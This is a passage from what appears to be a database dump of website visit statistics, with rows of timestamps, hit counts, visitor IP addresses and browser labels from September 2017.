1,1,0,0,'8.29.198.25','other'),(160345,1506409970,1,1,0,0,'77.222.134.101','other'),(160346,1506409989,1,1,0,0,'185.137.18.133','chrome'),(160347,1506409998,1,1,0,0,'194.187.216.12','chrome'),(160348,1506410111,1,1,0,0,'46.33.96.16','firefox'),(160349,1506410116,2,2,0,0,'46.229.168.65','other'),(160350,1506410143,1,1,0,0,'46.229.168.73','other'),(160351,1506410151,8,8,0,0,'46.229.168.76','other'),(160352,1506410170,5,5,0,0,'46.229.168.75','other'),(160353,1506410190,6,6,0,0,'46.229.168.79','other'),(160354,1506410234,4,4,0,0,'46.229.168.66','other'),(160355,1506410258,4,4,0,0,'46.229.168.77','other'),(160356,1506410297,5,5,0,0,'46.229.168.74','other'),(160357,1506410316,2,2,0,0,'46.229.168.70','other'),(160358,1506410367,5,5,0,0,'46.229.168.78','other'),(160359,1506410378,3,3,0,0,'46.229.168.72','other'),(160360,1506410407,3,3,0,0,'46.229.168.69','other'),(160361,1506410427,3,3,0,0,'46.229.168.68','other'),(160362,1506410477,1,1,0,0,'217.182.132.148','other'),(160363,1506410481,4,4,0,0,'46.229.168.67','other'),(160364,1506410585,1,1,0,0,'137.74.207.116','other'),(160365,1506410624,6,6,0,0,'46.229.168.80','other'),(160366,1506410767,1,1,0,0,'178.154.171.75','other'),(160367,1506410891,4,4,0,0,'5.45.207.64','other'),(160368,1506411139,9,9,0,0,'46.229.168.76','other'),(160369,1506411156,11,11,0,0,'46.229.168.71','other'),(160370,1506411170,1,1,0,0,'51.255.65.224','other'),(160371,1506411187,3,3,0,0,'46.229.168.73','other'),(160372,1506411197,1,1,0,0,'46.229.168.77','other'),(160373,1506411229,4,4,0,0,'46.229.168.79','other'),(160374,1506411245,1,1,0,0,'51.255.71.131','other'),(160375,1506411286,2,2,0,0,'46.229.168.72','other'),(160376,1506411325,3,3,0,0,'46.229.168.70','other'),(160377,1506411384,4,4,0,0,'46.229.168.66','other'),(160378,1506411412,3,3,0,0,'46.229.168.67','other'),(160379,1506411433,1,0,1,0,'66.249.66.156',''),(160380,1506411534,5,5,0,0,'46.229.168.75','other'),(160381,1506411542,3,3,0,0,'46.229.168.80','other'),(160382,1506411593,5,5,0,0,'46.229.168.69','other'),(160383,1506411604,1,1,0,0,'51.255.71.111','other'),(160384,1506411655,5,5,0,0,'46.229.168.74','other'),(160385,1506411657,1,1,0,0,'91.196.178.103','chrome'),(160386,1506411696,4,4,0,0,'46.229.168.78','other'),(160387,1506411746,6,6,0,0,'46.229.168.68','other'),(160388,1506411969,9,9,0,0,'46.229.168.65','other'),(160389,1506412089,4,4,0,0,'46.229.168.73','other'),(160390,1506412124,1,1,0,0,'217.182.132.65','other'),(160391,1506412126,2,2,0,0,'46.229.168.71','other'),(160392,1506412174,1,1,0,0,'217.182.132.20','other'),(160393,1506412199,5,5,0,0,'46.229.168.79','other'),(160394,1506412226,1,0,1,0,'66.249.66.155',''),(160395,1506412248,1,1,0,0,'66.249.66.155','chrome'),(160396,1506412258,5,5,0,0,'46.229.168.77','other'),(160397,1506412347,1,1,0,0,'46.229.168.66','other'),(160398,1506412363,4,4,0,0,'46.229.168.72','other'),(160399,1506412399,3,3,0,0,'46.229.168.67','other'),(160400,1506412436,5,5,0,0,'46.229.168.75','other'),(160401,1506412455,3,3,0,0,'46.229.168.76','other'),(160402,1506412671,1,1,0,0,'91.196.178.65','firefox'),(160403,1506412712,8,8,0,0,'46.229.168.74','other'),(160404,1506412859,1,1,0,0,'46.229.168.80','other'),(160405,1506412941,4,4,0,0,'46.229.168.65','other'),(160406,1506412985,1,1,0,0,'95.132.83.52','firefox'),(160407,1506413054,6,6,0,0,'46.229.168.78','other'),(160408,1506413063,6,6,0,0,'46.229.168.69','other'),(160409,1506413100,4,4,0,0,'46.229.168.79','other'),(160410,1506413118,4,4,0,0,'46.229.168.73','other'),(160411,1506413137,2,2,0,0,'46.229.168.71','other'),(160412,1506413257,5,5,0,0,'46.229.168.77','other'),(160413,1506413340,2,2,0,0,'46.229.168.66','other'),(160414,1506413412,2,2,0,0,'46.229.168.72','other'),(160415,1506413530,3,3,0,0,'46.229.168.70','other'),(160416,1506413540,1,1,0,0,'46.229.168.76','other'),(160417,1506413632,1,1,0,0,'46.229.168.75','other'),(160418,1506413716,2,2,0,0,'46.229.168.67','other'),(160419,1506413747,1,1,0,0,'46.229.168.74','other'),(160420,1506413778,3,3,0,0,'46.229.168.80','other'),(160421,1506413785,1,1,0,0,'217.182.132.170','other'),(160422,1506414012,1,1,0,0,'5.45.207.64','other'),(160423,1506414047,1,1,0,0,'178.95.66.130','firefox'),(160424,1506414126,1,1,0,0,'94.179.21.6','chrome'),(160425,1506414155,1,0,1,0,'66.249.66.76',''),(160426,1506414172,2,1,1,0,'66.249.66.75',''),(160427,1506414861,1,1,0,0,'93.175.233.179','other'),(160428,1506415011,1,0,1,0,'66.249.66.157',''),(160429,1506415988,1,1,0,0,'5.45.207.9','other'),(160430,1506416204,1,0,1,0,'68.180.229.52',''),(160431,1506416537,1,1,0,0,'5.45.207.64','other'),(160432,1506417524,2,2,0,0,'91.209.11.236','other'),(160433,1506417536,1,1,0,0,'216.244.66.237','other'),(160434,1506417615,1,1,0,0,'66.249.66.157','chrome'),(160435,1506417858,1,0,1,0,'66.249.66.156',''),(160436,1506418081,1,1,0,0,'95.135.91.129','chrome'),(160437,1506418539,1,1,0,0,'51.255.65.22','other'),(160438,1506418545,1,0,1,0,'66.249.66.74',''),(160439,1506418583,1,1,0,0,'217.182.132.68','other'),(160440,1506418730,1,1,0,0,'51.255.65.30','other'),(160441,1506418981,1,1,0,0,'5.45.207.64','other'),(160442,1506419498,1,1,0,0,'217.182.132.17','other'),(160443,1506419525,1,1,0,0,'164.132.162.155','other'),(160444,1506419536,1,0,1,0,'66.249.66.75',''),(160445,1506419555,1,1,0,0,'66.249.66.74','chrome'),(160446,1506419650,1,1,0,0,'216.244.66.237','other'),(160447,1506419880,1,1,0,0,'91.196.178.65','chrome'),(160448,1506419910,1,1,0,0,'5.45.207.64','other'),(160449,1506420039,1,1,0,0,'217.182.132.59','other'),(160450,1506420252,1,1,0,0,'217.182.132.35','other'),(160451,1506420582,1,1,0,0,'5.45.207.9','other'),(160452,1506420588,1,1,0,0,'8.29.198.27','other'),(160453,1506420624,1,1,0,0,'93.78.99.128','chrome'),(160454,1506421090,1,1,0,0,'51.255.65.29','other'),(160455,1506421790,1,1,0,0,'220.181.132.179','chrome'),(160456,1506421818,1,1,0,0,'106.120.162.111','chrome'),(160457,1506422482,1,1,0,0,'217.182.132.146','other'),(160458,1506422824,1,1,0,0,'178.154.171.75','other'),(160459,1506422838,1,1,0,0,'66.249.66.155','chrome'),(160460,1506422874,1,1,0,0,'91.196.178.133','firefox'),(160461,1506423045,1,1,0,0,'51.255.65.95','other'),(160462,1506423427,1,0,1,0,'68.180.229.52',''),(160463,1506423825,1,0,1,0,'66.249.66.156',''),(160464,1506423980,1,0,1,0,'66.249.66.155',''),(160465,1506424907,1,0,1,0,'66.249.66.156',''),(160466,1506425342,1,1,0,0,'217.182.132.56','other'),(160467,1506425397,1,1,0,0,'107.167.105.210','opera'),(160468,1506425811,1,1,0,0,'51.255.65.15','other'),(160469,1506426261,1,1,0,0,'144.76.12.66','other'),(160470,1506426357,1,1,0,0,'66.249.66.75','chrome'),(160471,1506426360,1,0,1,0,'66.249.66.74',''),(160472,1506426641,1,1,0,0,'91.196.178.67','chrome'),(160473,1506427081,1,1,0,0,'217.182.132.54','other'),(160474,1506427230,1,0,1,0,'66.249.66.155',''),(160475,1506427525,1,1,0,0,'204.79.180.12','msie'),(160476,1506427728,3,3,0,0,'91.209.11.236','other'),(160477,1506428152,1,1,0,0,'66.249.66.155','chrome'),(160478,1506428304,1,1,0,0,'51.255.65.30','other'),(160479,1506428427,1,1,0,0,'217.182.132.63','other'),(160480,1506428430,2,2,0,0,'5.45.207.64','other'),(160481,1506428624,1,1,0,0,'180.76.15.152','other'),(160482,1506429317,1,0,1,0,'66.249.66.75',''),(160483,1506429829,1,1,0,0,'217.182.132.74','other'),(160484,1506429859,1,1,0,0,'91.196.178.68','chrome'),(160485,1506429874,1,1,0,0,'91.196.177.46','chrome'),(160486,1506430830,1,1,0,0,'91.209.11.236','other'),(160487,1506431245,1,1,0,0,'94.179.165.126','chrome'),(160488,1506431393,1,1,0,0,'217.182.132.83','other'),(160489,1506431417,1,1,0,0,'8.29.198.25','other'),(160490,1506431420,1,1,0,0,'217.182.132.16','other'),(160491,1506431915,1,1,0,0,'91.196.178.164','chrome'),(160492,1506431993,1,0,1,0,'66.249.66.75',''),(160493,1506432063,1,1,0,0,'91.196.178.68','chrome'),(160494,1506432585,1,1,0,0,'51.255.65.9','other'),(160495,1506432978,1,1,0,0,'91.196.178.68','chrome'),(160496,1506433145,1,1,0,0,'86.122.217.65','firefox'),(160497,1506433272,1,1,0,0,'51.255.65.20','other'),(160498,1506433278,1,1,0,0,'216.244.66.237','other'),(160499,1506433295,2,0,2,0,'66.249.66.75',''),(160500,1506433575,1,1,0,0,'91.196.178.163','firefox'),(160501,1506433732,1,0,1,0,'66.249.66.155',''),(160502,1506434035,1,1,0,0,'66.249.66.74','chrome'),(160503,1506434037,1,1,0,0,'51.255.65.78','other'),(160504,1506434066,1,1,0,0,'66.249.66.156','chrome'),(160505,1506434378,1,1,0,0,'5.45.207.64','other'),(160506,1506434616,1,0,1,0,'66.249.66.157',''),(160507,1506435141,1,1,0,0,'217.182.132.172','other'),(160508,1506435153,1,1,0,0,'91.196.178.70','chrome'),(160509,1506435514,1,1,0,0,'5.153.135.158','chrome'),(160510,1506435656,1,1,0,0,'51.255.65.62','other'),(160511,1506435691,1,1,0,0,'217.182.132.60','other'),(160512,1506435855,1,1,0,0,'91.196.178.66','firefox'),(160513,1506436007,1,1,0,0,'217.182.132.151','other'),(160514,1506436517,1,1,0,0,'217.182.132.175','other'),(160515,1506437846,1,1,0,0,'217.182.132.69','other'),(160516,1506438162,1,1,0,0,'37.138.202.11','chrome'),(160517,1506438469,1,1,0,0,'51.255.65.52','other'),(160518,1506438509,1,1,0,0,'51.255.65.85','other'),(160519,1506438689,2,0,2,0,'66.249.66.156',''),(160520,1506438859,1,0,1,0,'66.249.66.155',''),(160521,1506439373,1,1,0,0,'130.180.211.222','firefox'),(160522,1506439459,1,1,0,0,'217.182.132.30','other'),(160523,1506440525,1,1,0,0,'91.209.11.236','other'),(160524,1506440579,1,1,0,0,'66.249.66.75','chrome'),(160525,1506440611,1,0,1,0,'68.180.230.153',''),(160526,1506440621,1,1,0,0,'5.45.207.64','other'),(160527,1506440665,1,1,0,0,'178.154.171.75','other'),(160528,1506440760,1,1,0,0,'130.180.211.222','firefox'),(160529,1506441928,1,1,0,0,'51.255.71.111','other'),(160530,1506442250,1,1,0,0,'8.29.198.25','other'),(160531,1506442429,1,1,0,0,'91.209.11.236','other'),(160532,1506442650,1,1,0,0,'54.165.59.7','other'),(160533,1506442667,1,1,0,0,'66.249.66.156','chrome'),(160534,1506442679,1,0,1,0,'68.180.229.52',''),(160535,1506442799,2,2,0,0,'164.132.162.160','other'),(160536,1506442849,1,1,0,0,'51.255.65.35','other'),(160537,1506444220,1,1,0,0,'217.182.132.170','other'),(160538,1506444420,1,1,0,0,'37.9.113.75','other'),(160539,1506444671,1,1,0,0,'217.182.132.176','other'),(160540,1506444757,1,1,0,0,'51.255.65.30','other'),(160541,1506444859,1,1,0,0,'51.255.65.23','other'),(160542,1506445629,1,1,0,0,'180.76.15.33','other'),(160543,1506445752,1,0,1,0,'68.180.230.153',''),(160544,1506445856,1,1,0,0,'37.54.18.167','chrome'),(160545,1506446133,1,1,0,0,'217.182.132.171','other'),(160546,1506446189,1,1,0,0,'5.45.207.9','other'),(160547,1506446442,1,0,1,0,'68.180.229.52',''),(160548,1506446508,1,1,0,0,'51.255.65.27','other'),(160549,1506446542,1,1,0,0,'66.249.70.29','chrome'),(160550,1506446589,1,1,0,0,'51.255.71.122','other'),(160551,1506446691,1,1,0,0,'51.255.65.69','other'),(160552,1506446835,1,1,0,0,'5.45.207.64','other'),(160553,1506447058,1,1,0,0,'51.255.65.64','other'),(160554,1506447220,1,1,0,0,'51.255.65.61','other'),(160555,1506447966,1,1,0,0,'217.182.132.25','other'),(160556,1506448367,1,1,0,0,'91.196.178.72','chrome'),(160557,1506448371,1,1,0,0,'217.182.132.192','other'),(160558,1506448974,1,1,0,0,'217.182.132.151','other'),(160559,1506448981,1,1,0,0,'51.255.65.8','other'),(160560,1506449324,2,0,2,0,'68.180.229.52',''),(160561,1506449854,1,1,0,0,'5.45.207.64','other'),(160562,1506449985,1,1,0,0,'66.249.64.29','chrome'),(160563,1506450185,1,1,0,0,'217.182.132.62','other'),(160564,1506450337,1,0,1,0,'66.249.64.30',''),(160565,1506451522,1,1,0,0,'37.73.225.94','chrome'),(160566,1506451676,1,1,0,0,'66.249.70.25','chrome'),(160567,1506451678,1,1,0,0,'51.255.71.133','other'),(160568,1506451743,1,1,0,0,'5.45.207.64','other'),(160569,1506451863,1,1,0,0,'217.182.132.170','other'),(160570,1506452067,1,1,0,0,'91.196.178.39','chrome'),(160571,1506452635,1,1,0,0,'217.182.132.90','other'),(160572,1506452766,1,1,0,0,'217.182.132.61','other'),(160573,1506453014,1,1,0,0,'51.255.71.118','other'),(160574,1506453078,1,1,0,0,'8.29.198.25','other'),(160575,1506453393,2,2,0,0,'40.77.167.47','other'),(160576,1506453818,1,1,0,0,'157.55.39.9','other'),(160577,1506453968,1,1,0,0,'5.45.207.64','other'),(160578,1506454561,2,2,0,0,'178.154.171.75','other'),(160579,1506454825,1,1,0,0,'51.255.64.106','other'),(160580,1506454978,1,1,0,0,'217.182.132.153','other'),(160581,1506455167,1,1,0,0,'37.147.100.158','msie'),(160582,1506455551,1,1,0,0,'217.182.132.15','other'),(160583,1506455671,1,1,0,0,'51.255.71.101','other'),(160584,1506455778,2,2,0,0,'216.244.66.237','other'),(160585,1506455877,1,1,0,0,'51.255.65.14','other'),(160586,1506455906,1,1,0,0,'51.255.65.96','other'),(160587,1506455907,1,1,0,0,'91.196.178.34','chrome'),(160588,1506456096,1,1,0,0,'54.165.59.7','other'),(160589,1506456156,1,1,0,0,'217.182.132.19','other'),(160590,1506456240,1,1,0,0,'180.76.15.151','other'),(160591,1506456612,1,1,0,0,'5.45.207.64','other'),(160592,1506456775,1,1,0,0,'217.182.132.155','other'),(160593,1506456927,1,1,0,0,'51.255.65.38','other'),(160594,1506457196,1,1,0,0,'54.165.59.7','other'),(160595,1506457613,1,1,0,0,'217.182.132.85','other'),(160596,1506458186,1,0,1,0,'68.180.230.153',''),(160597,1506458725,1,1,0,0,'217.182.132.83','other'),(160598,1506459165,1,1,0,0,'217.182.132.192','other'),(160599,1506459672,1,1,0,0,'162.210.196.100','other'),(160600,1506459802,1,1,0,0,'217.182.132.54','other'),(160601,1506460777,1,0,1,0,'66.249.64.28',''),(160602,1506460925,1,1,0,0,'51.255.65.94','other'),(160603,1506461498,1,1,0,0,'51.255.65.97','other'),(160604,1506462024,1,0,1,0,'66.249.70.27',''),(160605,1506462383,1,1,0,0,'51.255.71.114','other'),(160606,1506462551,1,1,0,0,'5.45.207.64','other'),(160607,1506463511,1,1,0,0,'217.182.132.185','other'),(160608,1506463908,1,1,0,0,'8.29.198.25','other'),(160609,1506464082,1,1,0,0,'5.45.207.9','other'),(160610,1506464427,1,1,0,0,'51.255.65.53','other'),(160611,1506464586,1,1,0,0,'213.136.89.45','other'),(160612,1506465176,1,1,0,0,'51.255.65.59','other'),(160613,1506465306,2,2,0,0,'216.244.66.237','other'),(160614,1506465650,1,0,1,0,'66.249.70.29',''),(160615,1506466026,1,1,0,0,'66.249.64.30','chrome'),(160616,1506466273,1,0,1,0,'66.249.64.28',''),(160617,1506466505,41,41,0,0,'82.193.100.107','other'),(160618,1506467035,1,1,0,0,'180.76.15.29','other'),(160619,1506467045,1,1,0,0,'180.76.15.161','other'),(160620,1506467879,1,1,0,0,'51.255.65.72','other'),(160621,1506468113,1,1,0,0,'81.1.242.33','other'),(160622,1506468522,3,3,0,0,'78.158.11.226','other'),(160623,1506468611,1,1,0,0,'217.182.132.20','other'),(160624,1506469911,1,1,0,0,'51.255.65.68','other'),(160625,1506469983,1,1,0,0,'217.182.132.21','other'),(160626,1506471054,1,1,0,0,'51.255.65.19','other'),(160627,1506471295,1,1,0,0,'51.255.65.47','other'),(160628,1506472302,2,2,0,0,'54.165.59.7','other'),(160629,1506472327,1,1,0,0,'217.182.132.20','other'),(160630,1506472675,3,3,0,0,'5.45.207.64','other'),(160631,1506473280,1,1,0,0,'51.255.71.101','other'),(160632,1506473419,1,1,0,0,'207.46.13.90','other'),(160633,1506474326,1,1,0,0,'51.255.65.97','other'),(160634,1506474752,1,1,0,0,'8.29.198.26','other'),(160635,1506475031,2,2,0,0,'5.45.207.64','other'),(160636,1506475045,1,1,0,0,'93.85.148.238','chrome'),(160637,1506475305,1,0,1,0,'66.249.64.28',''),(160638,1506475369,1,1,0,0,'137.74.207.188','other'),(160639,1506476157,1,1,0,0,'217.182.132.22','other'),(160640,1506476201,1,1,0,0,'5.45.207.9','other'),(160641,1506476609,1,1,0,0,'217.182.132.55','other'),(160642,1506477025,1,1,0,0,'51.255.65.61','other'),(160643,1506477510,1,1,0,0,'5.45.207.9','other'),(160644,1506477607,1,1,0,0,'95.108.213.9','other'),(160645,1506477611,1,1,0,0,'87.250.224.110','other'),(160646,1506477941,1,1,0,0,'51.255.71.128','other'),(160647,1506478401,1,1,0,0,'51.255.65.68','other'),(160648,1506478510,1,1,0,0,'217.182.132.180','other'),(160649,1506478816,1,1,0,0,'164.132.162.154','other'),(160650,1506478909,1,1,0,0,'216.244.66.237','other'),(160651,1506479027,1,1,0,0,'37.145.50.42','firefox'),(160652,1506479147,1,1,0,0,'51.255.65.37','other'),(160653,1506479499,1,1,0,0,'51.255.65.90','other'),(160654,1506480600,1,1,0,0,'51.255.71.129','other'),(160655,1506480742,1,0,1,0,'66.249.64.30',''),(160656,1506481473,25,25,0,0,'167.114.219.41','other'),(160657,1506481777,1,1,0,0,'217.182.132.60','other'),(160658,1506481893,1,1,0,0,'51.255.71.128','other'),(160659,1506483548,1,1,0,0,'217.182.132.21','other'),(160660,1506483972,1,1,0,0,'216.244.66.237','other'),(160661,1506484531,1,1,0,0,'178.154.171.68','other'),(160662,1506484583,1,1,0,0,'51.255.65.85','other'),(160663,1506485391,1,1,0,0,'217.182.132.71','other'),(160664,1506485581,1,1,0,0,'207.46.13.90','other'),(160665,1506485595,1,1,0,0,'8.29.198.26','other'),(160666,1506485671,1,1,0,0,'217.182.132.93','other'),(160667,1506486169,2,2,0,0,'40.77.167.47','other'),(160668,1506486352,1,1,0,0,'216.244.66.237','other'),(160669,1506486935,1,1,0,0,'217.182.132.29','other'),(160670,1506486961,1,1,0,0,'91.196.177.46','firefox'),(160671,1506487048,1,1,0,0,'217.182.132.188','other'),(160672,1506487142,1,1,0,0,'207.46.13.90','other'),(160673,1506487210,1,1,0,0,'217.182.132.33','other'),(160674,1506487550,1,1,0,0,'217.182.132.241','other'),(160675,1506488045,1,1,0,0,'51.255.65.5','other'),(160676,1506488156,1,0,1,0,'68.180.229.52',''),(160677,1506488309,1,1,0,0,'37.9.113.127','other'),(160678,1506488530,1,1,0,0,'137.74.207.116','other'),(160679,1506488939,2,2,0,0,'216.244.66.237','other'),(160680,1506488997,1,1,0,0,'178.137.82.201','firefox'),(160681,1506489300,1,1,0,0,'178.154.171.28','other'),(160682,1506490110,1,1,0,0,'91.196.178.68','firefox'),(160683,1506490260,1,1,0,0,'51.255.65.40','other'),(160684,1506490469,1,1,0,0,'51.255.65.24','other'),(160685,1506490503,1,1,0,0,'217.182.132.240','other'),(160686,1506490859,1,1,0,0,'178.154.171.28','other'),(160687,1506491023,1,1,0,0,'217.182.132.193','other'),(160688,1506491192,1,1,0,0,'216.244.66.237','other'),(160689,1506491422,1,1,0,0,'217.182.132.72','other'),(160690,1506491921,1,1,0,0,'91.196.178.68','chrome'),(160691,1506491939,14,14,0,0,'158.69.252.176','other'),(160692,1506492252,1,0,1,0,'66.249.70.27',''),(160693,1506492443,1,1,0,0,'91.196.178.69','firefox'),(160694,1506493297,1,0,1,0,'68.180.229.52',''),(160695,1506493388,1,1,0,0,'66.249.64.28','chrome'),(160696,1506494313,1,1,0,0,'137.74.201.99','other'),(160697,1506495206,1,1,0,0,'178.255.215.94','other'),(160698,1506495340,1,1,0,0,'217.182.132.156','other'),(160699,1506495942,1,1,0,0,'51.255.65.8','other'),(160700,1506495959,23,23,0,0,'69.197.139.130','msie'),(160701,1506496182,1,1,0,0,'95.67.73.198','other'),(160702,1506496235,1,1,0,0,'51.255.65.54','other'),(160703,1506496429,1,1,0,0,'8.29.198.27','other'),(160704,1506496729,1,1,0,0,'40.77.167.47','other'),(160705,1506496969,1,1,0,0,'51.255.65.40','other'),(160706,1506497683,1,1,0,0,'137.74.207.188','other'),(160707,1506497744,1,1,0,0,'81.1.242.33','other'),(160708,1506498057,1,1,0,0,'137.74.201.99','other'),(160709,1506498399,1,1,0,0,'37.52.120.220','chrome'),(160710,1506498794,1,1,0,0,'51.255.65.2','other'),(160711,1506499105,2,2,0,0,'137.74.203.194','other'),(160712,1506499437,1,1,0,0,'91.196.178.68','chrome'),(160713,1506499580,1,1,0,0,'51.255.65.62','other'),(160714,1506499844,1,1,0,0,'51.255.65.82','other'),(160715,1506500375,1,1,0,0,'46.229.168.66','other'),(160716,1506500385,1,1,0,0,'46.229.168.74','other'),(160717,1506500409,8,8,0,0,'46.229.168.77','other'),(160718,1506500421,9,9,0,0,'46.229.168.67','other'),(160719,1506500486,5,5,0,0,'46.229.168.78','other'),(160720,1506500495,4,4,0,0,'46.229.168.73','other'),(160721,1506500531,4,4,0,0,'46.229.168.68','other'),(160722,1506500554,7,7,0,0,'46.229.168.80','other'),(160723,1506500569,4,4,0,0,'46.229.168.76','other'),(160724,1506500617,5,5,0,0,'46.229.168.70','other'),(160725,1506500643,3,3,0,0,'46.229.168.75','other'),(160726,1506500713,1,1,0,0,'217.182.132.148','other'),(160727,1506500734,4,4,0,0,'46.229.168.65','other'),(160728,1506500862,6,6,0,0,'46.229.168.71','other'),(160729,1506500878,3,3,0,0,'46.229.168.69','other'),(160730,1506500975,1,1,0,0,'216.244.66.237','other'),(160731,1506501063,1,1,0,0,'217.182.132.31','other'),(160732,1506501094,1,1,0,0,'40.77.167.47','other'),(160733,1506501199,4,4,0,0,'46.229.168.72','other'),(160734,1506501236,1,1,0,0,'5.45.207.87','other'),(160735,1506501320,4,4,0,0,'46.229.168.79','other'),(160736,1506501344,5,5,0,0,'46.229.168.77','other'),(160737,1506501345,1,1,0,0,'176.15.19.105','msie'),(160738,1506501404,7,7,0,0,'46.229.168.66','other'),(160739,1506501428,6,6,0,0,'46.229.168.67','other'),(160740,1506501469,6,6,0,0,'46.229.168.78','other'),(160741,1506501559,5,5,0,0,'46.229.168.73','other'),(160742,1506501646,6,6,0,0,'46.229.168.74','other'),(160743,1506501753,4,4,0,0,'46.229.168.76','other'),(160744,1506501758,2,2,0,0,'46.229.168.68','other'),(160745,1506501793,2,2,0,0,'46.229.168.69','other'),(160746,1506501919,1,1,0,0,'46.229.168.75','other'),(160747,1506501938,1,1,0,0,'46.229.168.80','other'),(160748,1506501974,4,4,0,0,'46.229.168.65','other'),(160749,1506502025,1,1,0,0,'176.9.50.117','other'),(160750,1506502052,6,6,0,0,'46.229.168.70','other'),(160751,1506502123,2,2,0,0,'46.229.168.71','other'),(160752,1506502140,1,1,0,0,'46.229.168.72','other'),(160753,1506502265,1,1,0,0,'217.182.132.184','other'),(160754,1506502373,1,1,0,0,'46.229.168.67','other'),(160755,1506502419,2,2,0,0,'46.229.168.77','other'),(160756,1506502539,1,1,0,0,'106.38.241.150','other'),(160757,1506502580,1,1,0,0,'91.196.178.68','chrome'),(160758,1506502727,1,1,0,0,'46.188.34.125','msie'),(160759,1506502797,1,1,0,0,'51.255.65.69','other'),(160760,1506503169,1,1,0,0,'91.196.179.138','chrome'),(160761,1506503740,1,1,0,0,'51.255.65.95','other'),(160762,1506503908,1,1,0,0,'217.182.132.148','other'),(160763,1506504101,1,1,0,0,'137.74.207.110','other'),(160764,1506504425,1,1,0,0,'91.209.11.236','other'),(160765,1506504894,1,1,0,0,'217.182.132.190','other'),(160766,1506505253,1,1,0,0,'66.102.9.29','chrome'),(160767,1506505387,1,1,0,0,'178.95.66.130','firefox'),(160768,1506505570,1,1,0,0,'40.77.167.47','other'),(160769,1506506164,1,1,0,0,'51.255.65.76','other'),(160770,1506506191,1,1,0,0,'37.9.113.75','other'),(160771,1506506256,1,1,0,0,'141.8.142.109','other'),(160772,1506506289,1,1,0,0,'51.255.65.62','other'),(160773,1506506549,1,1,0,0,'51.255.65.66','other'),(160774,1506506556,1,1,0,0,'217.182.132.57','other'),(160775,1506506756,1,1,0,0,'141.8.142.91','other'),(160776,1506506844,1,1,0,0,'204.13.201.139','msie'),(160777,1506506845,1,1,0,0,'107.178.195.144','msie'),(160778,1506506929,1,1,0,0,'51.255.65.75','other'),(160779,1506507060,1,1,0,0,'5.45.207.64','other'),(160780,1506507062,1,1,0,0,'50.112.194.65','msie'),(160781,1506507068,1,1,0,0,'217.182.132.71','other'),(160782,1506507186,1,1,0,0,'139.59.149.99','msie'),(160783,1506507259,1,1,0,0,'8.29.198.26','other'),(160784,1506507593,1,1,0,0,'195.5.55.102','firefox'),(160785,1506508086,1,1,0,0,'51.255.65.87','other'),(160786,1506508464,1,1,0,0,'164.132.162.158','other'),(160787,1506508548,1,1,0,0,'95.108.181.97','other'),(160788,1506508713,1,1,0,0,'51.255.65.67','other'),(160789,1506508908,1,1,0,0,'217.182.132.88','other'),(160790,1506509022,1,1,0,0,'51.255.65.52','other'),(160791,1506509414,1,1,0,0,'176.31.231.10','other'),(160792,1506509970,1,1,0,0,'51.255.65.82','other'),(160793,1506510467,10,10,0,0,'88.198.16.12','other'),(160794,1506510680,1,1,0,0,'91.209.11.236','other'),(160795,1506510937,1,1,0,0,'217.182.132.19','other'),(160796,1506511177,1,1,0,0,'217.182.132.188','other'),(160797,1506511811,1,1,0,0,'217.69.133.194','other'),(160798,1506511901,1,1,0,0,'178.154.171.75','other'),(160799,1506511936,1,0,1,0,'66.249.64.29',''),(160800,1506512296,1,1,0,0,'195.211.240.41','chrome'),(160801,1506512717,1,1,0,0,'51.255.65.3','other'),(160802,1506512909,1,1,0,0,'178.92.85.5','firefox'),(160803,1506512942,1,1,0,0,'217.182.132.24','other'),(160804,1506513520,1,1,0,0,'51.255.65.25','other'),(160805,1506513549,1,1,0,0,'51.255.65.22','other'),(160806,1506514369,1,1,0,0,'51.255.71.117','other'),(160807,1506514434,1,1,0,0,'46.28.93.163','firefox'),(160808,1506514644,1,1,0,0,'51.255.65.71','other'),(160809,1506514949,1,1,0,0,'51.255.71.133','other'),(160810,1506516556,1,1,0,0,'51.255.65.84','other'),(160811,1506517016,1,1,0,0,'40.77.167.129','other'),(160812,1506517019,1,1,0,0,'51.255.65.8','other'),(160813,1506517518,1,0,1,0,'66.249.64.30',''),(160814,1506517907,1,1,0,0,'37.54.18.160','chrome'),(160815,1506518093,1,1,0,0,'8.29.198.25','other'),(160816,1506518372,1,1,0,0,'51.255.71.101','other'),(160817,1506518383,1,1,0,0,'51.255.65.31','other'),(160818,1506518560,1,0,1,0,'66.249.64.29',''),(160819,1506518667,1,1,0,0,'31.184.197.41','firefox'),(160820,1506518835,1,1,0,0,'217.182.132.147','other'),(160821,1506519008,1,1,0,0,'51.255.65.22','other'),(160822,1506519031,1,1,0,0,'164.132.162.164','other'),(160823,1506519218,1,1,0,0,'141.8.183.5','other'),(160824,1506519279,1,1,0,0,'62.80.173.76','chrome'),(160825,1506519315,1,1,0,0,'37.54.19.138','firefox'),(160826,1506519543,1,1,0,0,'209.90.225.210','chrome'),(160827,1506519790,1,1,0,0,'91.196.177.46','firefox'),(160828,1506519996,1,1,0,0,'217.182.132.185','other'),(160829,1506520053,1,1,0,0,'137.74.207.108','other'),(160830,1506520113,1,1,0,0,'37.73.233.30','chrome'),(160831,1506520531,1,1,0,0,'51.255.65.54','other'),(160832,1506520605,1,1,0,0,'94.179.147.128','chrome'),(160833,1506520830,1,1,0,0,'5.45.207.64','other'),(160834,1506520972,1,1,0,0,'217.182.132.19','other'),(160835,1506521048,5,5,0,0,'173.212.254.227','other'),(160836,1506521152,1,1,0,0,'51.255.65.35','other'),(160837,1506521255,2,2,0,0,'207.46.13.90','other'),(160838,1506521382,1,1,0,0,'137.74.207.188','other'),(160839,1506522389,1,1,0,0,'164.132.162.187','other'),(160840,1506522393,1,1,0,0,'91.196.178.69','firefox'),(160841,1506522435,2,2,0,0,'91.209.11.236','other'),(160842,1506522623,1,1,0,0,'51.255.65.75','other'),(160843,1506523185,1,1,0,0,'51.255.65.36','other'),(160844,1506523334,1,1,0,0,'217.182.132.171','other'),(160845,1506523385,1,1,0,0,'91.209.11.236','other'),(160846,1506523674,1,1,0,0,'51.255.65.48','other'),(160847,1506523729,1,1,0,0,'217.182.132.81','other'),(160848,1506523833,1,1,0,0,'164.132.162.187','other'),(160849,1506524280,1,1,0,0,'37.9.113.119','other'),(160850,1506524321,1,1,0,0,'5.45.207.87','other'),(160851,1506525260,1,1,0,0,'217.182.132.184','other'),(160852,1506525390,1,1,0,0,'37.9.113.127','other'),(160853,1506525437,2,2,0,0,'91.209.11.236','other'),(160854,1506525467,1,1,0,0,'217.182.132.176','other'),(160855,1506525584,1,1,0,0,'51.255.65.15','other'),(160856,1506525661,1,1,0,0,'217.182.132.86','other'),(160857,1506525962,1,1,